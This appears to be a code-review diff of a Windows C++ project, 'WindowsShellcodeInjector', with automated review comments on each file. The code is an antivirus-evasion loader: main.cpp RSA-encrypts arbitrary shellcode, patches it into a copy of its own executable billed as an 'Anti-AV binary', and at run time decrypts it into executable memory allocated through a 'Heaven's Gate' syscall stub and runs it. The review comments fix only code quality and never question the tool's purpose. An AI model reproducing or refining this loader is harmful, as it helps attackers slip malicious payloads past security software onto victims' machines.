     20 + };
     21 + uint8_t encrypted_shellcode[NEEDED_ENCRYPT_LENGTH(sizeof(shellcode))] = { 0 };
     22 + uint8_t decrypted_shellcode[sizeof(shellcode)] = { 0 };
     23 + 
     24 + std::EncryptShell(shellcode, sizeof(shellcode), encrypted_shellcode, sizeof(encrypted_shellcode), public_key);
     25 + std::DecryptShell(encrypted_shellcode, sizeof(encrypted_shellcode), decrypted_shellcode, sizeof(decrypted_shellcode), private_key);
     26 + 
     27 + for (int i = 0; i < sizeof(shellcode); i++) {
     28 + if (shellcode[i] != decrypted_shellcode[i]) {
     29 + flag = false;
     30 + }
     31 + }
     32 + }
     33 +}
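Review bot: the `while (!flag)` loop in `GenerateKey` retries until one fixed 16-byte vector happens to round-trip, which hides the encrypt/decrypt failure described in the comment instead of locating it; a key pair that passes this single vector can still fail on other input, and if the failure were systematic the loop would never terminate. Log the failing `p`, `q`, `e`, `d` and the encoded strings so the cause can be found, and cap the number of attempts. The argument order also flips between `GenerateKey(public_key, private_key)` and `std::GeneratePair(private_key, public_key)`; both parameters are strings, so a swap compiles silently, and the two signatures should use one order.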
  • ■ ■ ■ ■ ■
    WindowsShellcodeInjector/Utils.h
     1 +#pragma once
     2 + 
     3 +#include<string>
     4 + 
     5 +void GenerateKey(std::string &public_key, std::string &private_key);
  • ■ ■ ■ ■ ■ ■
    WindowsShellcodeInjector/WindowsShellcodeInjector.cpp
     1 +#include<iostream>
     2 +#include<Windows.h>
     3 +#include"WindowsShellcodeInjector.h"
     4 + 
     5 +void WindowsShellCodeInvoke::p32(UINT32 src, UINT8 *dst) {
     6 + for (int i = 0; i < 4; i++) {
     7 + dst[i] = src & 0xff;
     8 + src >>= 8;
     9 + }
     10 +}
     11 + 
     12 +void WindowsShellCodeInvoke::p64(UINT64 src, UINT8 *dst) {
     13 + for (int i = 0; i < 8; i++) {
     14 + dst[i] = src & 0xff;
     15 + src >>= 8;
     16 + }
     17 +}
     18 + 
     19 +LPVOID WindowsShellCodeInvoke::VirtualAllocMemory(LPVOID base, UINT32 size, UINT32 flAllocationType, UINT32 flProtect) {
     20 + UINT64 base_address = (UINT64)base;
     21 + UINT8 p_base_address[4];
     22 + p32((UINT32)&base_address, p_base_address);
     23 + 
     24 + UINT64 region_size = size;
     25 + UINT8 p_region_size[4];
     26 + p32((UINT32)&region_size, p_region_size);
     27 + 
     28 + UINT64 tmp = flAllocationType;
     29 + UINT8 fl_allocation_type[8];
     30 + p64(tmp, fl_allocation_type);
     31 + 
     32 + UINT8 fl_protect[8];
     33 + tmp = flProtect;
     34 + p64(tmp, fl_protect);
     35 + 
     36 +#define FLAT_ARRAY_DWORD(arr, base) arr[0 + base], arr[1 + base], arr[2 + base], arr[3 + base]
     37 +#define FLAT_ARRAY_QWORD(arr, base) FLAT_ARRAY_DWORD(arr, base + 0), FLAT_ARRAY_DWORD(arr, base + 4)
     38 + 
     39 + UINT8 bytes_sequence[] = {
     40 + FUNCTION_ENTER,
     41 + HEAVENS_GAET_ENTER,
     42 + 
     43 + 0x48, 0x31, 0xC9, // xor rcx, rcx
     44 + 0x48, 0xFF, 0xC9, // dec rcx #ProcessHandle
     45 + 0x49, 0x89, 0xCA, // mov r10, rcx
     46 + 0xBA, FLAT_ARRAY_DWORD(p_base_address, 0), // mov edx, #&base_address
     47 + 0x41, 0xB8, 0xFF, 0xFF, 0xFE, 0x7F, // mov r8d, 0x7FFEFFFF #ZeroBits
     48 + 0x41, 0xB9, FLAT_ARRAY_DWORD(p_region_size, 0), // mov r9d, #&RegionSize
     49 + 0x41, 0x57, // push r15
     50 + 0x49, 0xBF, FLAT_ARRAY_QWORD(fl_protect, 0), // movabs r15, #flAllocationType
     51 + 0x41, 0x57, // push r15
     52 + 0x49, 0xBF, FLAT_ARRAY_QWORD(fl_allocation_type, 0), // movabs r15, #flProtect
     53 + 0x41, 0x57, // push r15
     54 + 0x41, 0x5F, // pop r15
     55 + 0x41, 0x5F, // pop r15
     56 + 0x41, 0x5F, // pop r15
     57 + 
     58 + 0xB8, 0x18, 0x00, 0x00, 0x00, // mov eax, 0x18
     59 + 
     60 + 0x48, 0x83, 0xEC, 0x40, // sub rsp, 0x30
     61 + 0x0F, 0x05, // syscall
     62 +
     63 + HEAVENS_GATE_LEAVE,
     64 + FUNCTION_LEAVE,
     65 + };
     66 + 
     67 + InvokeShellcode(bytes_sequence, sizeof(bytes_sequence));
     68 + 
     69 + return (LPVOID)base_address;
     70 +}
     71 + 
     72 +VOID WindowsShellCodeInvoke::InvokeShellcode(UINT8* bytes_sequence, UINT32 length) {
     73 + UINT32 block_size = (length & 0xfffff000) | ((length | 0xfff) ? 1000 : 0);
     74 + LPVOID bytes_mem = VirtualAlloc(NULL, block_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
     75 + memcpy_s(bytes_mem, block_size, bytes_sequence, length);
     76 + typedef void(*ShellMem)();
     77 + ((ShellMem)bytes_mem)();
     78 +}
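Review bot: in `InvokeShellcode`, `(length | 0xfff) ? 1000 : 0` is always true because of the `|`, and it ORs in decimal 1000 rather than 0x1000, so `block_size` is not a page-rounded size and can be smaller than `length` (a length of 0x7ff gives 1000), in which case `memcpy_s` fails its bounds check. The usual form is `(length + 0xfff) & ~0xfffu`. The return values of `VirtualAlloc` and `memcpy_s` are never checked before the buffer is called, and the allocation is never released. In `VirtualAllocMemory` several comments disagree with the bytes beside them: `0x48, 0x83, 0xEC, 0x40` is annotated `sub rsp, 0x30`, and the `fl_protect` and `fl_allocation_type` operands carry each other's names in their comments. `(UINT32)&base_address` truncates a pointer and is only valid in a 32-bit build, which should be stated or asserted.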
  • ■ ■ ■ ■ ■ ■
    WindowsShellcodeInjector/WindowsShellcodeInjector.h
     1 +#pragma once
     2 +#include<Windows.h>
     3 + 
     4 +class WindowsShellCodeInvoke {
     5 +#define HEAVENS_GAET_ENTER 0x6A, 0x33, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x83, 0x04, 0x24, 0x05, 0xCB
     6 +#define HEAVENS_GATE_LEAVE 0xE8, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x04, 0x23, 0x00, 0x00, 0x00, 0x83, 0x04, 0x24, 0x0D, 0xCB, 0x66, 0x8C, 0xD8, 0x8E, 0xD0
     7 + 
     8 +#define FUNCTION_ENTER 0x55, 0x89, 0xE5, 0x83, 0xe4, 0xf0
     9 +#define FUNCTION_LEAVE 0x89, 0xEC, 0x5D, 0xC3
     10 + 
     11 +private:
     12 + typedef void (__cdecl * LPSYSCALL_FUNC)(
     13 + UINT64 shellcode,
     14 + UINT64 args1, UINT64 args2, UINT64 args3, UINT64 args4,
     15 + UINT64 args_nums,
     16 + UINT64 args_arr,
     17 + UINT32 *ret
     18 + );
     19 + 
     20 + LPSYSCALL_FUNC p_syscall_func;
     21 + 
     22 +public:
     23 + WindowsShellCodeInvoke() { }
     24 + 
     25 + LPVOID VirtualAllocMemory(LPVOID base, UINT32 size, UINT32 flAllocationType, UINT32 flProtect);
     26 + 
     27 + VOID InvokeShellcode(UINT8* bytes_sequence, UINT32 length);
     28 + 
     29 +protected:
     30 + void p32(UINT32, UINT8* dst);
     31 + 
     32 + void p64(UINT64, UINT8* dst);
     33 +};
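Review bot: `HEAVENS_GAET_ENTER` on line 5 is misspelled next to `HEAVENS_GATE_LEAVE` on line 6; rename it so the pair is consistent. The four `#define`s sit inside the class body, but macros are not scoped to a class, so move them above `class WindowsShellCodeInvoke` to avoid implying otherwise. `p_syscall_func` is declared on line 20 and the constructor on line 23 has an empty body, so the pointer is left uninitialized; set it to `nullptr` or drop the member if nothing uses it.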
  • ■ ■ ■ ■ ■ ■
    WindowsShellcodeInjector/WindowsShellcodeInjector.vcxproj
     1 +<?xml version="1.0" encoding="utf-8"?>
     2 +<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
     3 + <ItemGroup Label="ProjectConfigurations">
     4 + <ProjectConfiguration Include="Debug|Win32">
     5 + <Configuration>Debug</Configuration>
     6 + <Platform>Win32</Platform>
     7 + </ProjectConfiguration>
     8 + <ProjectConfiguration Include="Release|Win32">
     9 + <Configuration>Release</Configuration>
     10 + <Platform>Win32</Platform>
     11 + </ProjectConfiguration>
     12 + <ProjectConfiguration Include="Debug|x64">
     13 + <Configuration>Debug</Configuration>
     14 + <Platform>x64</Platform>
     15 + </ProjectConfiguration>
     16 + <ProjectConfiguration Include="Release|x64">
     17 + <Configuration>Release</Configuration>
     18 + <Platform>x64</Platform>
     19 + </ProjectConfiguration>
     20 + </ItemGroup>
     21 + <PropertyGroup Label="Globals">
     22 + <VCProjectVersion>15.0</VCProjectVersion>
     23 + <ProjectGuid>{895F5563-64DA-4642-8577-0C5AF67D8F0A}</ProjectGuid>
     24 + <Keyword>Win32Proj</Keyword>
     25 + <RootNamespace>WindowsShellcodeInjector</RootNamespace>
     26 + <WindowsTargetPlatformVersion>10.0.17763.0</WindowsTargetPlatformVersion>
     27 + </PropertyGroup>
     28 + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
     29 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
     30 + <ConfigurationType>Application</ConfigurationType>
     31 + <UseDebugLibraries>true</UseDebugLibraries>
     32 + <PlatformToolset>v141</PlatformToolset>
     33 + <CharacterSet>Unicode</CharacterSet>
     34 + </PropertyGroup>
     35 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
     36 + <ConfigurationType>Application</ConfigurationType>
     37 + <UseDebugLibraries>false</UseDebugLibraries>
     38 + <PlatformToolset>v141</PlatformToolset>
     39 + <WholeProgramOptimization>true</WholeProgramOptimization>
     40 + <CharacterSet>Unicode</CharacterSet>
     41 + </PropertyGroup>
     42 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
     43 + <ConfigurationType>Application</ConfigurationType>
     44 + <UseDebugLibraries>true</UseDebugLibraries>
     45 + <PlatformToolset>v141</PlatformToolset>
     46 + <CharacterSet>Unicode</CharacterSet>
     47 + </PropertyGroup>
     48 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
     49 + <ConfigurationType>Application</ConfigurationType>
     50 + <UseDebugLibraries>false</UseDebugLibraries>
     51 + <PlatformToolset>v141</PlatformToolset>
     52 + <WholeProgramOptimization>true</WholeProgramOptimization>
     53 + <CharacterSet>Unicode</CharacterSet>
     54 + </PropertyGroup>
     55 + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
     56 + <ImportGroup Label="ExtensionSettings">
     57 + </ImportGroup>
     58 + <ImportGroup Label="Shared">
     59 + </ImportGroup>
     60 + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     61 + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
     62 + </ImportGroup>
     63 + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
     64 + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
     65 + </ImportGroup>
     66 + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
     67 + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
     68 + </ImportGroup>
     69 + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     70 + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
     71 + </ImportGroup>
     72 + <PropertyGroup Label="UserMacros" />
     73 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     74 + <LinkIncremental>true</LinkIncremental>
     75 + <IncludePath>$(IncludePath)</IncludePath>
     76 + <LibraryPath>$(LibraryPath)</LibraryPath>
     77 + </PropertyGroup>
     78 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
     79 + <LinkIncremental>true</LinkIncremental>
     80 + </PropertyGroup>
     81 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
     82 + <LinkIncremental>false</LinkIncremental>
     83 + </PropertyGroup>
     84 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     85 + <LinkIncremental>false</LinkIncremental>
     86 + </PropertyGroup>
     87 + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     88 + <ClCompile>
     89 + <PrecompiledHeader>
     90 + </PrecompiledHeader>
     91 + <WarningLevel>Level3</WarningLevel>
     92 + <Optimization>Disabled</Optimization>
     93 + <SDLCheck>false</SDLCheck>
     94 + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
     95 + <ConformanceMode>true</ConformanceMode>
     96 + </ClCompile>
     97 + <Link>
     98 + <SubSystem>Console</SubSystem>
     99 + <GenerateDebugInformation>true</GenerateDebugInformation>
     100 + <AdditionalDependencies>gmpxx.lib;gmp.lib;%(AdditionalDependencies)</AdditionalDependencies>
     101 + </Link>
     102 + </ItemDefinitionGroup>
     103 + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
     104 + <ClCompile>
     105 + <PrecompiledHeader>
     106 + </PrecompiledHeader>
     107 + <WarningLevel>Level3</WarningLevel>
     108 + <Optimization>Disabled</Optimization>
     109 + <SDLCheck>false</SDLCheck>
     110 + <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
     111 + <ConformanceMode>true</ConformanceMode>
     112 + </ClCompile>
     113 + <Link>
     114 + <SubSystem>Console</SubSystem>
     115 + <GenerateDebugInformation>true</GenerateDebugInformation>
     116 + </Link>
     117 + </ItemDefinitionGroup>
     118 + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
     119 + <ClCompile>
     120 + <PrecompiledHeader>
     121 + </PrecompiledHeader>
     122 + <WarningLevel>Level3</WarningLevel>
     123 + <Optimization>MaxSpeed</Optimization>
     124 + <FunctionLevelLinking>true</FunctionLevelLinking>
     125 + <IntrinsicFunctions>true</IntrinsicFunctions>
     126 + <SDLCheck>false</SDLCheck>
     127 + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
     128 + <ConformanceMode>true</ConformanceMode>
     129 + <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
     130 + </ClCompile>
     131 + <Link>
     132 + <SubSystem>Console</SubSystem>
     133 + <EnableCOMDATFolding>true</EnableCOMDATFolding>
     134 + <OptimizeReferences>true</OptimizeReferences>
     135 + <GenerateDebugInformation>true</GenerateDebugInformation>
     136 + </Link>
     137 + </ItemDefinitionGroup>
     138 + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     139 + <ClCompile>
     140 + <PrecompiledHeader>
     141 + </PrecompiledHeader>
     142 + <WarningLevel>Level3</WarningLevel>
     143 + <Optimization>MaxSpeed</Optimization>
     144 + <FunctionLevelLinking>true</FunctionLevelLinking>
     145 + <IntrinsicFunctions>true</IntrinsicFunctions>
     146 + <SDLCheck>true</SDLCheck>
     147 + <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
     148 + <ConformanceMode>true</ConformanceMode>
     149 + </ClCompile>
     150 + <Link>
     151 + <SubSystem>Console</SubSystem>
     152 + <EnableCOMDATFolding>true</EnableCOMDATFolding>
     153 + <OptimizeReferences>true</OptimizeReferences>
     154 + <GenerateDebugInformation>true</GenerateDebugInformation>
     155 + </Link>
     156 + </ItemDefinitionGroup>
     157 + <ItemGroup>
     158 + <ClCompile Include="main.cpp" />
     159 + <ClCompile Include="mini-gmp.cpp" />
     160 + <ClCompile Include="Utils.cpp" />
     161 + <ClCompile Include="RSA.cpp" />
     162 + <ClCompile Include="ShellcodeSplitor.cpp" />
     163 + <ClCompile Include="WindowsShellcodeInjector.cpp" />
     164 + </ItemGroup>
     165 + <ItemGroup>
     166 + <ClInclude Include="mini-gmp.h" />
     167 + <ClInclude Include="mini-gmpxx.h" />
     168 + <ClInclude Include="RSA.h" />
     169 + <ClInclude Include="ShellcodeSplitor.h" />
     170 + <ClInclude Include="Utils.h" />
     171 + <ClInclude Include="WindowsShellcodeInjector.h" />
     172 + </ItemGroup>
     173 + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
     174 + <ImportGroup Label="ExtensionTargets">
     175 + </ImportGroup>
     176 +</Project>
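Review bot: `<SDLCheck>` is `false` on lines 93, 109 and 126 and `true` only for Release|x64 on line 146, so three of the four configurations build without the SDL compile-time checks; enable it in all four or document why it is off. The configurations also differ in ways that look accidental: `gmpxx.lib;gmp.lib` is added to the linker on line 100 for Debug|Win32 only, although `mini-gmp.cpp` is compiled into every configuration on line 159, and `<RuntimeLibrary>` is set on line 129 for Release|Win32 only. Make the four `ItemDefinitionGroup` blocks agree, or comment the intended differences.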
  • ■ ■ ■ ■ ■ ■
    WindowsShellcodeInjector/WindowsShellcodeInjector.vcxproj.filters
     1 +<?xml version="1.0" encoding="utf-8"?>
     2 +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
     3 + <ItemGroup>
     4 + <Filter Include="源文件">
     5 + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
     6 + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
     7 + </Filter>
     8 + <Filter Include="头文件">
     9 + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
     10 + <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
     11 + </Filter>
     12 + <Filter Include="资源文件">
     13 + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
     14 + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
     15 + </Filter>
     16 + </ItemGroup>
     17 + <ItemGroup>
     18 + <ClCompile Include="WindowsShellcodeInjector.cpp">
     19 + <Filter>源文件</Filter>
     20 + </ClCompile>
     21 + <ClCompile Include="ShellcodeSplitor.cpp">
     22 + <Filter>源文件</Filter>
     23 + </ClCompile>
     24 + <ClCompile Include="RSA.cpp">
     25 + <Filter>源文件</Filter>
     26 + </ClCompile>
     27 + <ClCompile Include="Utils.cpp">
     28 + <Filter>源文件</Filter>
     29 + </ClCompile>
     30 + <ClCompile Include="main.cpp">
     31 + <Filter>源文件</Filter>
     32 + </ClCompile>
     33 + <ClCompile Include="mini-gmp.cpp">
     34 + <Filter>源文件</Filter>
     35 + </ClCompile>
     36 + </ItemGroup>
     37 + <ItemGroup>
     38 + <ClInclude Include="WindowsShellcodeInjector.h">
     39 + <Filter>头文件</Filter>
     40 + </ClInclude>
     41 + <ClInclude Include="ShellcodeSplitor.h">
     42 + <Filter>头文件</Filter>
     43 + </ClInclude>
     44 + <ClInclude Include="RSA.h">
     45 + <Filter>头文件</Filter>
     46 + </ClInclude>
     47 + <ClInclude Include="Utils.h">
     48 + <Filter>头文件</Filter>
     49 + </ClInclude>
     50 + <ClInclude Include="mini-gmpxx.h">
     51 + <Filter>头文件</Filter>
     52 + </ClInclude>
     53 + <ClInclude Include="mini-gmp.h">
     54 + <Filter>头文件</Filter>
     55 + </ClInclude>
     56 + </ItemGroup>
     57 +</Project>
  • WindowsShellcodeInjector/libgcc_s_dw2-1.dll
    Binary file.
  • WindowsShellcodeInjector/libgmp-10.dll
    Binary file.
  • WindowsShellcodeInjector/libgmp-10.lib
    Binary file.
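Review bot: Three prebuilt binaries (`libgcc_s_dw2-1.dll`, `libgmp-10.dll`, `libgmp-10.lib`) are committed with no visible source, build recipe or checksum, so they cannot be reviewed in this diff. The project file compiles `mini-gmp.cpp` from source and names `gmpxx.lib;gmp.lib` rather than `libgmp-10.lib` as linker inputs, which suggests these files are not needed. Remove them from the commit, or record where they came from and how to verify them.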
  • ■ ■ ■ ■ ■ ■
    WindowsShellcodeInjector/main.cpp
     1 +#include<iostream>
     2 +#include<fstream>
     3 +#include"Utils.h"
     4 +#include"RSA.h"
     5 +#include"WindowsShellcodeInjector.h"
     6 + 
     7 +using namespace std;
     8 + 
     9 +#define MAX_ENCRYPT_SHELLCODE 4096
     10 +#define MAX_SHELLCODE 2048
     11 + 
     12 +#define MAGIC 0xff, 0xff, 0xdd, 0x11, 0x99, 0x10
     13 + 
     14 +struct ShellCode {
     15 + uint8_t shellcode[MAX_ENCRYPT_SHELLCODE] = {
     16 + MAGIC
     17 + };
     18 + uint32_t shellcode_size = 0;
     19 + uint32_t shellcode_real_size = 0;
     20 +};
     21 + 
     22 +ShellCode shellcode;
     23 + 
     24 +int seeking(char *src, int size, char *magic, int msize) {
     25 + int result = -1;
     26 + 
     27 + for (int pos = 0; pos < size - msize; pos++) {
     28 + bool success = true;
     29 + for (int i = 0; i < msize; i++) {
     30 + if (src[pos + i] != magic[i]) {
     31 + success = false;
     32 + break;
     33 + }
     34 + }
     35 + if (success) {
     36 + return pos;
     37 + }
     38 + }
     39 + return result;
     40 +}
     41 + 
     42 +int en(int argc, char **argv) {
     43 + if (argc != 2) {
     44 + cout << "Usage: 0xUBypass.exe [shellcode_path]" << endl
     45 + << "shellcode_path is a relative path to the binary file contains all your shellcode";
     46 + return -1;
     47 + }
     48 + 
     49 + string public_key, private_key;
     50 + GenerateKey(public_key, private_key);
     51 + 
     52 + cout << "[*] Generated Private Key => " << private_key << endl;
     53 + 
     54 + ifstream input_shellcode(string("./") + argv[1], ios::in | ios::binary);
     55 + if (!input_shellcode.is_open()) {
     56 + cout << "Failed - Make sure your shellcode file exists and readable" << endl;
     57 + return -1;
     58 + }
     59 + 
     60 + uint8_t tmp_shell[MAX_SHELLCODE] = { 0 };
     61 + input_shellcode.read((char *)tmp_shell, MAX_SHELLCODE);
     62 + size_t size = input_shellcode.gcount();
     63 + if (size <= 0) {
     64 + cout << "Failed - Empty shellcode file or an unexpected error occurred" << endl;
     65 + return -1;
     66 + }
     67 +
     68 + //padding to ENCRYPT_BLOCK_SIZE
     69 + size = CEIL(size, (ENCRYPT_BLOCK_SIZE / 8)) * (ENCRYPT_BLOCK_SIZE / 8);
     70 + 
     71 + cout << "[*] Your Padding Original Shellcode Size is " << size << endl;
     72 + cout << "[*] Your Padding Encrypted Shellcode Size is " << NEEDED_ENCRYPT_LENGTH(size) << endl;
     73 + //encrypt
     74 + EncryptShell(tmp_shell, size, shellcode.shellcode, NEEDED_ENCRYPT_LENGTH(size), public_key);
     75 + 
     76 + cout << "[*] Your Encrypted Shellcode is ";
     77 + for (int i = 0; i < NEEDED_ENCRYPT_LENGTH(size); i++) {
     78 + printf("%02x", shellcode.shellcode[i]);
     79 + }
     80 + cout << endl;
     81 + 
     82 + //remove old
     83 + remove("kawaii.exe");
     84 + cout << "[*] Removed old binary file" << endl;
     85 + 
     86 + //copy self
     87 + ifstream exec(argv[0], ios::in | ios::binary);
     88 + ofstream patched("kawaii.exe", ios::out | ios::binary);
     89 + 
     90 + uint8_t magic_number[] = {
     91 + MAGIC
     92 + };
     93 + 
     94 + uint8_t *buffer = (uint8_t *)malloc(1024 * 1024);
     95 + memset(buffer, 0, sizeof(buffer));
     96 + exec.read((char *)buffer, 1024 * 1024);
     97 + int p = seeking((char *)buffer, exec.gcount(), (char *)magic_number, sizeof(magic_number));
     98 + if (p >= 0) {
     99 + for (int i = 0; i < NEEDED_ENCRYPT_LENGTH(size); i++) {
     100 + buffer[i + p] = shellcode.shellcode[i];
     101 + }
     102 + size_t en_size = NEEDED_ENCRYPT_LENGTH(size);
     103 + size_t de_size = size;
     104 + for (int i = 0; i < 4; i++) {
     105 + buffer[p + MAX_ENCRYPT_SHELLCODE + i] = (en_size & 0xff);
     106 + en_size >>= 8;
     107 + }
     108 + 
     109 + for (int i = 0; i < 4; i++) {
     110 + buffer[p + MAX_ENCRYPT_SHELLCODE + 4 + i] = (de_size & 0xff);
     111 + de_size >>= 8;
     112 + }
     113 + }
     114 + 
     115 + patched.write((char *)buffer, exec.gcount());
     116 + 
     117 + cout << endl << "[*] Generated Anti-AV binary file => kawaii.exe" << endl;
     118 + cout << "[*] Usage Command => kawaii.exe " << " '" << private_key << "'" << endl;
     119 + 
     120 + patched.close();
     121 + exec.close();
     122 + 
     123 + free(buffer);
     124 + return 0;
     125 +}
     126 + 
     127 +int de(int argc, char **argv) {
     128 + if (argc != 2) {
     129 + return 0;
     130 + }
     131 + string key = argv[1];
     132 +
     133 + WindowsShellCodeInvoke invoker;
     134 + LPVOID shell_mem = invoker.VirtualAllocMemory(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
     135 + DecryptShell(shellcode.shellcode, shellcode.shellcode_size, (uint8_t *)shell_mem, shellcode.shellcode_real_size, key);
     136 + 
     137 + typedef void(*fptr)();
     138 + ((fptr)shell_mem)();
     139 + 
     140 + return 0;
     141 +}
     142 + 
     143 +int main(int argc, char **argv) {
     144 + if (shellcode.shellcode_size != 0) {
     145 + return de(argc, argv);
     146 + }
     147 + return en(argc, argv);
     148 +}
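Review bot: `memset(buffer, 0, sizeof(buffer))` on line 95 clears only pointer-size bytes because `buffer` is a `uint8_t *`, and the `malloc` result on line 94 is used without a NULL check; pass the allocation size and check the pointer. When `seeking` returns -1, the `if (p >= 0)` block on line 98 is skipped, but lines 115 to 118 still write the output file and print the success messages, so the not-found case should return an error instead. The loop bound `pos < size - msize` on line 27 never tests the last possible offset, and neither `exec` on line 87 nor `patched` on line 88 is checked with `is_open()` before use.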
  • WindowsShellcodeInjector/mini-gmp.cpp
    Diff is too large to be displayed.
  • ■ ■ ■ ■ ■ ■
    WindowsShellcodeInjector/mini-gmp.h
     1 +/* mini-gmp, a minimalistic implementation of a GNU GMP subset.
     2 + 
     3 +Copyright 2011-2015 Free Software Foundation, Inc.
     4 + 
     5 +This file is part of the GNU MP Library.
     6 + 
     7 +The GNU MP Library is free software; you can redistribute it and/or modify
     8 +it under the terms of either:
     9 + 
     10 + * the GNU Lesser General Public License as published by the Free
     11 + Software Foundation; either version 3 of the License, or (at your
     12 + option) any later version.
     13 + 
     14 +or
     15 + 
     16 + * the GNU General Public License as published by the Free Software
     17 + Foundation; either version 2 of the License, or (at your option) any
     18 + later version.
     19 + 
     20 +or both in parallel, as here.
     21 + 
     22 +The GNU MP Library is distributed in the hope that it will be useful, but
     23 +WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
     24 +or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
     25 +for more details.
     26 + 
     27 +You should have received copies of the GNU General Public License and the
     28 +GNU Lesser General Public License along with the GNU MP Library. If not,
     29 +see https://www.gnu.org/licenses/. */
     30 + 
     31 +/* About mini-gmp: This is a minimal implementation of a subset of the
     32 + GMP interface. It is intended for inclusion into applications which
     33 + have modest bignums needs, as a fallback when the real GMP library
     34 + is not installed.
     35 + 
     36 + This file defines the public interface. */
     37 + 
     38 +#ifndef __MINI_GMP_H__
     39 +#define __MINI_GMP_H__
     40 + 
     41 + /* For size_t */
     42 +#include <stddef.h>
     43 +/* for CHAR_BIT */
     44 + 
     45 +#if defined (__cplusplus)
     46 +extern "C" {
     47 +#endif
     48 + 
     49 + void mp_set_memory_functions(void *(*) (size_t),
     50 + void *(*) (void *, size_t, size_t),
     51 + void(*) (void *, size_t));
     52 + 
     53 + void mp_get_memory_functions(void *(**) (size_t),
     54 + void *(**) (void *, size_t, size_t),
     55 + void(**) (void *, size_t));
     56 + 
     57 + typedef unsigned long mp_limb_t;
     58 + typedef long mp_size_t;
     59 + typedef unsigned long mp_bitcnt_t;
     60 + 
     61 + typedef mp_limb_t *mp_ptr;
     62 + typedef const mp_limb_t *mp_srcptr;
     63 + 
     64 + typedef struct
     65 + {
     66 + int _mp_alloc; /* Number of *limbs* allocated and pointed
     67 + to by the _mp_d field. */
     68 + int _mp_size; /* abs(_mp_size) is the number of limbs the
     69 + last field points to. If _mp_size is
     70 + negative this is a negative number. */
     71 + mp_limb_t *_mp_d; /* Pointer to the limbs. */
     72 + } __mpz_struct;
     73 + 
     74 + typedef __mpz_struct mpz_t[1];
     75 + 
     76 + typedef __mpz_struct *mpz_ptr;
     77 + typedef const __mpz_struct *mpz_srcptr;
     78 + 
     79 + extern const int mp_bits_per_limb;
     80 + 
     81 + void mpn_copyi(mp_ptr, mp_srcptr, mp_size_t);
     82 + void mpn_copyd(mp_ptr, mp_srcptr, mp_size_t);
     83 + void mpn_zero(mp_ptr, mp_size_t);
     84 + 
     85 + int mpn_cmp(mp_srcptr, mp_srcptr, mp_size_t);
     86 + int mpn_zero_p(mp_srcptr, mp_size_t);
     87 + 
     88 + mp_limb_t mpn_add_1(mp_ptr, mp_srcptr, mp_size_t, mp_limb_t);
     89 + mp_limb_t mpn_add_n(mp_ptr, mp_srcptr, mp_srcptr, mp_size_t);
